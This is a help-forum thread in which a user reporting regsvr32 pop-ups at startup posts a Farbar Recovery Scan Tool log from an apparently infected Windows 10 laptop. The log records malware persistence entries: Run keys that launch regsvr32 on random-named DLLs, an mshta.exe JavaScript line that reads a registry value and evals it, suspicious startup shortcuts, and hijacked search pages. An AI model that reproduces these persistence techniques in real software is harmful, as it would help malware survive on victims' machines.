Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

regsvr32 problem


  • Please log in to reply

#1
uwek007

uwek007

    New Member

  • Member
  • Pip
  • 5 posts

Untitled.png

 

basically when i start my laptop. this two thing will pop up.. i've been reading some of the post which has the same problem with this.. i will paste the result from FRST


  • 0

Advertisements


#2
uwek007

uwek007

    New Member

  • Topic Starter
  • Member
  • Pip
  • 5 posts
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-11-2016
Ran by taurus silver (administrator) on TAURUS-SILVER (28-11-2016 04:38:26)
Running from C:\Users\taurus silver\Downloads\Programs
Loaded Profiles: taurus silver (Available Profiles: taurus silver)
Platform: Windows 10 Home Single Language Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: "C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe" -- "%1")
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
() C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe
(ESET) C:\Program Files\ESET\ESET Smart Security\ekrn.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\AsLdrSrv.exe
(ASUS) C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Condusiv Technologies) C:\Program Files\Condusiv Technologies\ExpressCache\ExpressCache.exe
(ASUS) C:\Program Files\ASUS\ASUS FlipLock\FlipService.exe
(Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.11.399\AsusWSWinService.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(Freemake) C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(Nitro PDF Software) C:\Program Files\Nitro\Pro 10\NitroPDFDriverService10x64.exe
() C:\Program Files\Nitro\Pro 10\Nitro_UpdateService.exe
(Dassault Systemes) D:\Catia\intel_a\code\bin\CATSysDemon.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
() C:\Program Files (x86)\UCBrowser\Application\UCService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\HControl.exe
() C:\Program Files\ASUS\ASUS FlipLock\FlipController.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Hotkey\KBFiltr.exe
(ASUSTek Computer INC.) C:\ProgramData\AsTouchPanel\AsPatchTouchPanel64.exe
(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
() C:\Program Files\ASUS\ASUS FlipLock\WifiPowerManager.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATK Media\DMedia.exe
(ASUSTek Computer Inc.) C:\Program Files (x86)\ASUS\ATK Package\ATKOSD2\ATKOSD2.exe
(ESET) C:\Program Files\ESET\ESET Smart Security\egui.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe
(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe
(Logitech Inc.) C:\Program Files\Logitech\Gaming Software\LWEMon.exe
(Akamai Technologies, Inc.) C:\Users\taurus silver\AppData\Local\Akamai\netsession_win.exe
(Akamai Technologies, Inc.) C:\Users\taurus silver\AppData\Local\Akamai\netsession_win.exe
(Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
() C:\Program Files (x86)\UCBrowser\Application\5.7.16817.1002\UCAgent.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
 
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Start WingMan Profiler] => C:\Program Files\Logitech\Gaming Software\LWEMon.exe [190536 2010-06-14] (Logitech Inc.)
HKLM\...\Run: [Nvtmru] => "C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\nvtmru.exe"
HKLM\...\Run: [ShadowPlay] => C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2397120 2016-06-15] (NVIDIA Corporation)
HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.2.11.570\ASUSWSLoader.exe [63968 2016-08-12] (ASUS Cloud Corporation)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [25673776 2016-11-08] (Dropbox, Inc.)
HKLM-x32\...\Run: [ProductUpdater] => C:\Program Files (x86)\Common Files\Freemake Shared\ProductUpdater\ProductUpdater.exe [75776 2016-06-09] ()
HKLM-x32\...\Run: [Autodesk Desktop App] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [721856 2016-07-01] (Autodesk, Inc.)
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 0
HKLM\...\Policies\Explorer: [NoResolveSearch] 1
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2860832 2016-10-13] (Valve Corporation)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Akamai NetSession Interface] => C:\Users\taurus silver\AppData\Local\Akamai\netsession_win.exe [4691384 2015-09-10] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Office Timeline Performance Helper] => C:\Program Files (x86)\Office Timeline\Current\OfficeTimelineStartup.exe [15424 2015-09-02] (OfficeTimeline LLC)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3924024 2016-04-17] (Tonec Inc.)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Impksoft] => C:\Users\taurus silver\AppData\Local\Impksoft\tmp790D.exe
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Atcwworks] => regsvr32.exe "C:\Users\taurus silver\AppData\Local\Atcwworks\lwfbitpm.dll" <===== ATTENTION
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Ezcption] => C:\Windows\SysWOW64\regsvr32.exe "C:\Users\taurus silver\AppData\Local\Impksoft\mtjjempv.dll"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [uTorrent] => C:\Users\taurus silver\AppData\Roaming\uTorrent\uTorrent.exe [1741136 2016-09-24] (BitTorrent Inc.)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [Google Update] => C:\Users\taurus silver\AppData\Local\Google\Update\GoogleUpdate.exe [153752 2016-07-29] (Google Inc.)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [**imcc<*>] => "C:\Users\taurus silver\AppData\Local\072a96d0\5c23265f.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Run: [**rkcnffng<*>] => "C:\WINDOWS\system32\mshta.exe" javascript:THWN19a="UJPphu";O9O0=new%20ActiveXObject("WScript.Shell");Lhpla0H="k32J4";uWD0f=O9O0.RegRead("HKCU\\software\\jvjtduhgj\\cdweuob");xJe3lf="J4nBkj25";eval(uW (the data entry has 17 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\RunOnce: [Uninstall C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\RunOnce: [Uninstall C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\RunOnce: [Uninstall C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\RunOnce: [Uninstall C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6390.0509] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\taurus silver\AppData\Local\Microsoft\OneDrive\17.3.6390.0509"
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\Policies\Explorer: [] 
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\MountPoints2: {ccf6f375-7528-11e6-8338-08626654ee0c} - "E:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\...\MountPoints2: {d86e9ae3-5640-11e6-8322-08626654ee0c} - "E:\Lenovo_Suite.exe" 
HKLM\...\Providers\enxfdq9s: D:\pendrive\\local64spl.dll [142336 2016-09-28] ()
HKLM\...\Providers\gcsolqyi: D:\_jvm\\local64spl.dll [142336 2016-09-28] ()
HKLM\...\Providers\gvqraqgu: D:\Arduino\\local64spl.dll [142336 2016-09-28] ()
HKLM\...\Providers\uf14wv1f: C:\_\local64spl.dll [142336 2016-09-28] ()
HKLM\...\Providers\xjj75ex2: C:\\local64spl.dll [142336 2016-09-28] ()
ShellIconOverlayIdentifiers: [   IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2015-08-14] (Tonec Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.2.11.570\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.2.11.570\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.2.11.570\ASUSWSShellExt64.dll [2015-04-22] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2016-08-24] ()
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2016-02-07] (Autodesk, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt3] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt4] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt5] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt6] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt7] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt8] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt9] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.3.0.dll [2016-11-08] (Dropbox, Inc.)
Startup: C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\886b6a28.lnk [2016-11-28]
ShortcutTarget: 886b6a28.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4571635.lnk [2016-10-18]
ShortcutTarget: d4571635.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\taurus silver\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2016-05-15]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation)
GroupPolicy: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{186c8f47-4084-48bc-be63-75f621f55705}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{186c8f47-4084-48bc-be63-75f621f55705}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{b4fb2577-0d5d-4ddb-9e7c-57d2b953c7db}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{b4fb2577-0d5d-4ddb-9e7c-57d2b953c7db}: [DhcpNameServer] 10.0.8.19 10.0.8.20
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://malaysia.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://malaysia.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\S-1-5-21-3880736737-1765239813-1450978002-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/en-my/?ocid=iehp
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
SearchScopes: HKLM -> {1b31c9d2-7135-442b-bb93-7c002172adc6} URL = 
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_fremkfs_16_24&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCtByCtN1L2XzutAtFtBtBtFtAtFzztN1L1Czu1BtCtDtN1L1G1B1V1N2Y1L1Qzu2StBzytC0EtBtAtC0EtGyC0D0D0AtGtDzytC0EtGtAyDtCyEtGtD0D0E0CtAtA0FyCtAyBzy0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyE%26cr%3D964303875%26a%3Dwbf_fremkfs_16_24%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://malaysia.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_inprft_16_32&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dmy%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1QzuyEtD0EtBtAtD0D0C0EtBtDzyyE0DtBtCtN0D0Tzu0StCyCzzyEtN1L2XzutAtFtByEtFyCtFyBtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StDyBzyzytCyEtD0CtGtBtD0AyCtG0F0AtCyCtGyC0D0F0CtG0EzytA0EyDtDtB0DtD0AtA0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0DtBtAyE0FyEzy0BtGtBzyyCyEtGyEzzzztDtGzzyE0CtDtG0A0B0ByDtCyE0B0BtB0A0C0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutBtAtByC%26cr%3D1035003672%26a%3Dwbf_inprft_16_32%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome%2BSingle%2BLanguage&p={searchTerms}
